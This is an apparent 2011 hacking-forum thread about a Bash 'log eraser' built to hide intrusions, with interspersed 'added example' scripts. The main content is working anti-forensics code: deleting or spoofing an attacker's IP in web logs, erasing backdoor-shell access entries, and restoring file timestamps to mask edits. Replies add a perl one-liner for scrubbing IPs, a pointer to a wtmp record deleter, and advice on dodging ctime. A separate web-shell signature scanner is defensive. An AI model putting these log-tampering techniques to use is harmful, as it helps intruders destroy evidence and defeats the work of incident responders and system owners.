
View Full Version : Project: Linux Log Eraser v0.1



b0nd
05-26-2011, 10:26 AM
Hi Friends,

I have been working on the concept for a couple of days and believe I've coded >50% of what I intended to automate. So I am posting the code and concept here to get more ideas, feedback and suggestions.

Q. Why another log wiper when there are already many?
Ans: Just for fun! The most effective ones are already there and have been coded in 'C'. I am just playing with BASH to learn it more. Moreover, the existing log wipers coded in BASH, which I could find over the net, are not good enough.

Ok, the following are the features I've already implemented:
1. Delete a particular IP from log files
2. Spoof a particular IP in log files
3. Delete the log entries for the web back door shell from web logs, e.g. the case when you first access your web back door and then initiate a back connect shell from it.
4. Restore the time stamps for all the log files which have been accessed and edited. ctime sucks ;)
5. Get some basic system info
6. Verify-IP: To inform the user if by mistake he has entered an invalid IP (it includes 3 different checks on user input)
7. Exit feature from almost every part of the code. Cannot use Ctrl + C as that would kill the shell itself

Pending features and issues:
1. Erase user activity logs from log files (wtmp, utmp, lastlog etc). lastlog sucks ;)
2. Stop logging feature
3. Implement a "smart" function which would take input from a text file and proceed without user interaction
4. Maybe a feature that would crawl the whole system to find back door shells uploaded by other attackers
5. I don't know a way to restore the time stamp for ctime. It gets modified whenever there is some change in the inode entry etc. of the file or if the file itself has been edited.
6. Maybe some features to let the user know the different kinds of security tools implemented on the server, e.g. IPtables, SElinux, AV etc.
7. ...............

There is a lot of scaffolding as I am still working on it.

Feel free to play with the script, it won't harm your machine as you can 'exit' from it anytime.
Please post some ideas, suggestions, feedback... and if free enough, then chip in to work together as 1+1=11



Rgds

PS: Delete the trailing .txt extension.
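Added example, not b0nd's attached script: features 1, 2 and 4 from the list above applied to a constructed Apache-style log, with a check of the ctime problem in pending item 5. The whole-word matching for IPs, the in-place rewrite that keeps the inode, and the snapshot/restore of atime and mtime with touch -r are my choices, not the script's; it assumes GNU coreutils, grep and sed (touch -r, touch -d, stat -c, the \b anchor in sed).

```bash
#!/bin/bash
# Added example, not b0nd's script: features 1, 2 and 4 from the list above,
# applied to a constructed sample log, plus the ctime check behind pending
# item 5. Assumes GNU coreutils/grep/sed (touch -r, touch -d, stat -c, \b).
set -u

# Escape the dots of an IPv4 address so they are literal in a sed regex.
ip_re() { printf '%s' "$1" | sed 's/\./\\./g'; }

# Rewrite log $1 in place through the filter command given in the remaining
# arguments. The inode is kept (owner, mode and hard links untouched) and
# atime/mtime are restored from a snapshot. ctime cannot be restored this
# way: the kernel stamps it with the current time on every write.
rewrite_log() {
    local log="$1"; shift
    local ref tmp
    ref=$(mktemp) && tmp=$(mktemp) || return 1
    touch -r "$log" "$ref"                   # snapshot atime and mtime
    "$@" < "$log" > "$tmp" || [ $? -eq 1 ]   # grep exits 1 if nothing is left
    cat "$tmp" > "$log"                      # overwrite in place, same inode
    touch -r "$ref" "$log"                   # put atime/mtime back
    rm -f "$ref" "$tmp"
}

# Feature 1: drop every line containing IP $2 as a whole word, so that
# deleting 10.0.0.5 leaves 10.0.0.50 alone.
delete_ip() { rewrite_log "$1" grep -v -w -F -- "$2"; }

# Feature 2: replace IP $2 with IP $3 wherever it appears as a whole word.
spoof_ip() { rewrite_log "$1" sed "s/\b$(ip_re "$2")\b/$3/g"; }

# Timestamps as epoch seconds, for checking what the rewrite preserved.
mtime() { stat -c %Y "$1"; }
ctime() { stat -c %Z "$1"; }

# Constructed Apache-style access log (not real data) for the demo below.
write_sample_log() {
    cat > "$1" <<'EOF'
10.0.0.5 - - [26/May/2011:10:26:01 +0530] "GET /uploads/shell.php HTTP/1.1" 200 512
10.0.0.50 - - [26/May/2011:10:26:02 +0530] "GET /index.html HTTP/1.1" 200 1024
192.168.1.7 - - [26/May/2011:10:26:03 +0530] "GET /login HTTP/1.1" 302 0
10.0.0.5 - - [26/May/2011:10:26:04 +0530] "POST /uploads/shell.php?cmd=id HTTP/1.1" 200 77
EOF
}

# Demo: age the sample log, wipe one IP, spoof another, and compare stamps.
# mtime comes back unchanged; ctime jumps to now and gives the edit away.
demo() {
    local d log
    d=$(mktemp -d) || return 1
    log="$d/access.log"
    write_sample_log "$log"
    touch -d '2011-05-26 10:26:04' "$log"
    printf 'before: mtime=%s ctime=%s lines=%s\n' \
        "$(mtime "$log")" "$(ctime "$log")" "$(wc -l < "$log")"
    delete_ip "$log" 10.0.0.5
    spoof_ip "$log" 192.168.1.7 203.0.113.9
    printf 'after:  mtime=%s ctime=%s lines=%s\n' \
        "$(mtime "$log")" "$(ctime "$log")" "$(wc -l < "$log")"
    cat "$log"
    rm -rf "$d"
}
demo
```

The cat-into-the-file step matters: sed -i or a mv of a temp file gives the log a new inode, which changes ownership and breaks hard links and any open file descriptor the daemon holds. Either way the ctime moves to the time of the edit, which is exactly the gap pending item 5 describes; stat -c %Z on a log whose ctime is newer than its mtime is one thing a responder will look for.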

"vinnu"
05-26-2011, 10:37 AM
Will be pretty helpful bhai. This code is definitely going to help all of us..."vinnu"

abhaythehero
05-26-2011, 11:12 AM
That is superb ! I am learning bash and this is very helpful.
Would love to contribute to the code. Will post here if I can find some suggestions. :)

the_empty
05-26-2011, 11:16 AM
+1 to vinnu.

One of the most important things I have almost always observed in B0nd's code is that it is really well managed, with proper documentation. Even if we read the code years after its development, there will be no question marks. You're my inspiration, B0nd.... thanks a lot

prashant_uniyal
05-26-2011, 11:33 AM
+100000000000 to vinnu bro and the_empty ;)


It's working fine. Just missing some of your own mentioned pending features. Will also try to edit it on my own once I get handy with bash scripting :) Thanks for the wonderful idea! Cheers !! ;)

s1ayer
05-26-2011, 11:57 AM
Cool bro....... one thing... for the ctime entry..... I don't know, but.... we can avoid changes in ctime, atime and mtime by modifying the default system time.... as all timestamp updating is done by taking the system time only (not sure.....)

b0nd
05-26-2011, 12:04 PM
Cool bro....... one thing... for the ctime entry..... I don't know, but.... we can avoid changes in ctime, atime and mtime by modifying the default system time.... as all timestamp updating is done by taking the system time only (not sure.....)

Thanks for the suggestion s1ayer. Yes, surely that can be done, but it should not be, as there could be many cron jobs and other time-dependent activities running on the server.

@abhay, in that case chip in fast :)
@the_empty, yeah, I am in the good practice of documenting the code, else I forget the flow easily

s1ayer
05-26-2011, 01:30 PM
hello bro,
If you just want to change the inode entry then I guess it can be done through kernel tweaking.... I read it somewhere in my college..

:P got the result in the first search itself ........
two ways of doing it: first, touch; second, changing the block
http://www.linuxquestions.org/questions/linux-security-4/can-we-change-entries-in-the-inode-table-of-a-file-linux-881578/

http://linux.die.net/man/1/touch
:) still to test it....

for windows:
http://www.techrepublic.com/article/build-your-skills-learn-to-manipulate-file-time-stamps-in-windows/5034280

abhaythehero
05-26-2011, 02:59 PM
1. Erase user activity logs from log files (wtmp, utmp, lastlog etc).
apologies for the script kiddie attitude :D
but this one rocks http://www.phrack.org/issues.html?issue=25&id=6#article
Tried and tested. Deletes records from the wtmp file.

s1ayer
05-26-2011, 03:41 PM
^^ nice.......
But we can do that in one line also:
perl -pi -e 's/192\.168\.1\.1/ /g' logfilename
;) It's all about doing one thing in different ways......


cheers

fb1h2s
05-26-2011, 04:09 PM
Something I really wanted these days. Thanks b0nd, it tastes better when it's built under a garage roof :)

neo
05-26-2011, 04:12 PM
Abhay, you are missing the point completely.

As b0nd said, there are lots of log erasers already on the net.
He is doing it for practicing Bash scripting.
My suggestion for helping him would be: you also contribute with some code if you want to :)

Godwin Austin
05-26-2011, 05:42 PM
Nicely coded up ... Best thing is that it's a shell script.
The code flow is nice. Well documented, and the comments are precise.
Something I should bring in practice. :)

Will see if I have any ideas about it and try to chip in.

abhaythehero
05-26-2011, 07:35 PM
Abhay, you are missing the point completely.

As b0nd said, there are lots of log erasers already on the net.
He is doing it for practicing Bash scripting.
My suggestion for helping him would be: you also contribute with some code if you want to :)

Yes, that is exactly what I wanted to. Actually I am just starting to get the hang of Linux security mechanisms. It will take some time :)
Yups, you are right, from now on I will contribute my own code only :cool:

s1ayer
06-01-2011, 06:32 PM
Hi bro,

I have tried to code a shell search for any Linux/Unix system... well, I don't know shell scripting... so the whole code is not mine, it is from Google..................
Just give it a look once... if you want any changes... just let me know.....

Search strings: hard coded... I think it's a shell... so it better be hard coded... since I don't know the best search query for any shell...... so I just gave some random strings... you can modify them.........
This program is slow :/.......... In future I will try to optimize it more.
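Added example, not s1ayer's attached script (which is not on this page): a grep-based sweep for PHP web shells of the kind pending feature 4 in b0nd's post describes. The signature list, the file-extension filter and the function names are mine and are only a starting point; a hit is a lead to read by hand, not proof of a backdoor. It assumes a grep that supports -r and --include (GNU or BSD).

```bash
#!/bin/bash
# Added example, not s1ayer's attached script: a grep-based sweep for PHP web
# shells with a constructed signature list (pending feature 4 in b0nd's post).
# A hit is a lead to inspect by hand, not proof of a backdoor. Assumes a grep
# with -r and --include (GNU or BSD).
set -u

# Execution sinks fed straight from request data or from an obfuscation
# decoder: the two idioms almost every PHP backdoor shares. Extended regex.
WEBSHELL_PATTERNS='(eval|assert|system|passthru|shell_exec|popen|proc_open)[[:space:]]*\([[:space:]]*(\$_(GET|POST|REQUEST|COOKIE)|base64_decode|gzinflate|str_rot13)'

# Print "path:line:source" for every suspicious line under directory $1,
# looking only at files whose extension is in the comma list $2
# (default php,phtml,cgi,pl). Exit 0 whether or not anything was found.
find_webshells() {
    local root="$1" exts="${2:-php,phtml,cgi,pl}" ext inc=()
    local IFS=','
    for ext in $exts; do inc+=( "--include=*.$ext" ); done
    grep -rHniE "${inc[@]}" -e "$WEBSHELL_PATTERNS" -- "$root" || [ $? -eq 1 ]
}

# Number of suspicious lines, for a summary or a go/no-go check.
count_hits() { find_webshells "$@" | wc -l | tr -d ' '; }

# Usage: bash webshell_scan.sh /var/www [php,phtml]
if [ $# -gt 0 ]; then
    find_webshells "$@"
    printf 'suspicious lines: %s\n' "$(count_hits "$@")"
fi
```

Restricting the scan to script extensions keeps it fast on a large document root, but it also means a backdoor parked in a .jpg or .txt and included from elsewhere is missed; running it a second time with the extension list widened is the cheap way to cover that case.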

Hackuin
06-02-2011, 05:54 PM
@slayer:

1. You have commented out the line which reads "# kindly ensure you have root access". Please try to display it to the end user with either "printf" or "echo". You should echo the message to the user instead of leaving it in the comments.

Or force the user to be root with:


#!/bin/bash
#: Description: Forcing the user to be root, or displaying a message to end-users to become root.

__rootUid=0 #: As we know, the user ID of root is 0

#: $UID is set by bash; fall back to id -u in case it is ever unset.
if [ "${UID:-$(id -u)}" -ne "$__rootUid" ] #: Please use the desired STDOUT message for the end-user.
then
    printf "%s\n" "Cannot run script: Permission denied." "Please be root to use this script."
    exit 1
fi


2. Please try to build it with STDIN functionality.

@b0nd:
The script is very good.
I would also ask you to force the user to be root, which leaves us with a little less coding. I mean, the whole processing/identification of who the user is and all. It is also helpful as distributions like Fedora, OpenSuse etc. have root-only read access (-rw-------) to certain files like "wtmp", and also, in the default configuration of "ubuntu" you won't find /var/log/messages; obviously your script looks for the files mentioned in the array. However, it would have been simply done with "ls -R /var/log/*" for displaying the log files available on his/her distribution, and you can also use "grep Permi" to just display to the user which files he doesn't have access to as well.

I need a little more time to simply go through your complete script; I have not even run it yet. Just a few points.
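Added example, not b0nd's script or Hackuin's snippet: the discovery step Hackuin suggests, done with find and test rather than by grepping "Permission denied" out of ls output. It lists the log files that actually exist on the box, marks which ones the current user can read and write, and reports which of a script's expected paths are absent (the /var/log/messages-on-Ubuntu case). Function names and the output format are mine; it assumes a POSIX find, test and awk.

```bash
#!/bin/bash
# Added example, not b0nd's script or Hackuin's snippet: discover the log
# files that actually exist on this box and which of them the current user
# can read and write, instead of trusting a hard-coded array of paths.
# Assumes a POSIX find, test and awk; /var/log is the default root.
set -u

# One line per regular file under $1: "<r|-><w|-> <path>", sorted.
list_logs() {
    local root="${1:-/var/log}" f r w
    find "$root" -type f 2>/dev/null | sort | while IFS= read -r f; do
        [ -r "$f" ] && r=r || r=-
        [ -w "$f" ] && w=w || w=-
        printf '%s%s %s\n' "$r" "$w" "$f"
    done
}

# Only the files the caller can rewrite: the working list for a wiper.
# substr from column 4 keeps paths that contain spaces intact.
writable_logs() { list_logs "$@" | awk '$1 == "rw" { print substr($0, 4) }'; }

# Files the caller cannot even read, i.e. the "Permission denied" set that
# Hackuin suggests showing the user (root gets an empty list here).
unreadable_logs() { list_logs "$@" | awk 'substr($1, 1, 1) == "-" { print substr($0, 4) }'; }

# Which of the paths a script expects are absent on this distribution
# (e.g. /var/log/messages on a default Ubuntu). Prints the missing ones.
missing_logs() {
    local p
    for p in "$@"; do [ -e "$p" ] || printf '%s\n' "$p"; done
}

# Usage: bash log_discovery.sh [/var/log]
if [ $# -gt 0 ]; then
    list_logs "$1"
fi
```

Note that -r and -w answer for the current user only; when the script later runs as root (as Hackuin proposes) every file comes back rw, and the interesting output is then missing_logs, which tells the script which entries of its array it should drop on this distribution.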

s1ayer
06-02-2011, 06:01 PM
@Hackuin

thanks for the suggestion bro....... will implement it.........

b0nd
06-03-2011, 02:22 PM
Hackuin, thanks for the valuable comments. Better not read the script in detail at the moment, because I have designed it again from scratch and will be posting it here soon. Let's have the discussion after that.

s1ayer, thanks to you too for your inputs. I'll work on that as well.

Rgds